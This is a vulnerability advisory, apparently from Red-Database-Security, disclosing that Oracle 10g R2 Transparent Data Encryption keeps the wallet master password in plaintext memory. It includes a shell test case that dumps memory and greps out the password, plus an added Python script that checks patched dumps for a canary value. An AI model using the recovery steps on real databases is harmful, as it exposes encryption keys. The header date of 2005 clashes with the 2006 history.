Transparent Data Encryption stores key unencrypted in the SGA
Name: Transparent Data Encryption stores key unencrypted in the SGA
Systems Affected: Oracle Database 10g Release 2
Severity: High Risk
Category: Information disclosure
Vendor URL: http://www.oracle.com/
Author: Alexander Kornbrust (ak at red-database-security.com)
Date: 17 January 2005 (V 1.00)
Oracle Bugno: 5802173
Time to fix: 190 days
Details
The Oracle security feature "Transparent Data Encryption" stores the master key unencrypted
in the SGA. A skilled attacker or a non-security DBA can retrieve the plaintext master key.
Test case
SQL> ALTER SYSTEM SET WALLET OPEN IDENTIFIED BY "secretpassword";
System altered.
SQL> exit
Disconnected from Oracle Database 10g Enterprise Edition Release 10.2.0.1.0
Production With the Partitioning, OLAP and Data Mining options
[oracle@ora10201 /]$ export DUMPSGA_DIR=/oracle/10.2.0/bin
[oracle@ora10201 /]$ cd /tmp
[oracle@ora10201 /]$ dumpsga
[oracle@ora10201 /]$ strings * | grep -iH secretpassword
secretpassword
secretpassword
secretpassword
[...] Excerpt from the SGA
/oracle/10.2.0/admin/ora01/wallet/^@"[q^@^@ôçd$d$^@?y*cle/10.2.0/admin/ora10201/wallet/^@^@^@^@^@^9^@^@0êd$d¤d$-
^@^@0êd$L4^L¿^Xp /¹]/º<8f>^Dsecretpassword^@^M^U^B^@èd$´4^Lfile:/oracle/10.2.0/admin/ora10201/wallet
[...]
Patch Information
Oracle fixed this issue in the Critical Patch Update January 2006 patches for Oracle 10g Release 2.
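One way to check the fix on a test instance, as an added example that is not part of the original advisory or Oracle's code: open the wallet with a throwaway canary password, produce the dump files as in the test case above, then scan them for the canary in several encodings and report only file name and byte offset. The function names, file names and canary value are assumptions, and the sample dump files are constructed.

```python
import os
import tempfile

ENCODINGS = ("utf-8", "utf-16-le", "utf-16-be")

def find_canary(path, canary, chunk_size=1 << 20):
    """Return sorted (encoding, byte offset) hits for canary in one file."""
    if not canary:
        raise ValueError("canary must be non-empty")
    needles = {enc: canary.encode(enc) for enc in ENCODINGS}
    keep = max(len(n) for n in needles.values()) - 1
    hits, tail, base = set(), b"", 0      # base = file offset of buf[0]
    with open(path, "rb") as fh:
        # Stream in chunks so a multi-gigabyte dump is never loaded whole.
        while chunk := fh.read(chunk_size):
            buf = tail + chunk
            for enc, needle in needles.items():
                pos = buf.find(needle)
                while pos != -1:
                    hits.add((enc, base + pos))
                    pos = buf.find(needle, pos + 1)
            # Carry the last bytes over so a match split across chunks is found.
            tail = buf[-keep:]
            base += len(buf) - len(tail)
    return sorted(hits)

def scan_dump_dir(dump_dir, canary):
    """Map file name -> hits for each regular file that contains the canary."""
    report = {}
    for name in sorted(os.listdir(dump_dir)):
        path = os.path.join(dump_dir, name)
        if os.path.isfile(path):
            hits = find_canary(path, canary)
            if hits:
                report[name] = hits
    return report

def demo():
    """Constructed sample: one dump that leaks the canary, one that does not."""
    canary = "Canary-Wallet-Pw-01"        # constructed, test-only password
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "sga_leaky.dmp"), "wb") as fh:
            fh.write(b"\x00" * 70 + b"wallet/\x00" + canary.encode() + b"\x00file:")
        with open(os.path.join(d, "sga_clean.dmp"), "wb") as fh:
            fh.write(b"\x00\xff" * 200)
        return scan_dump_dir(d, canary)

if __name__ == "__main__":
    for name, hits in demo().items():     # never prints the secret itself
        print(name, hits)
```

An empty report on a patched instance is the expected result; any hit means the password is still recoverable from the dump.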
History
11-jul-2005 Oracle secalert was informed
12-jul-2005 Bug confirmed
17-jan-2006 Oracle published the Critical Patch Update January 2006 (CPU January 2006)
17-jan-2006 Red-Database-Security published this advisory
© 2006 by Red-Database-Security GmbH - last update 17-jan-2006
Oracle Transparent Data Encryption (TDE)
Oracle Transparent Data Encryption enables you to encrypt data in columns
without having to manage the encryption key. Businesses can protect
sensitive data in their databases without having to make changes to
their applications.
Oracle Transparent Data Encryption is a new feature of Oracle 10g Release 2 and part of the Oracle Advanced Security Option (ASO).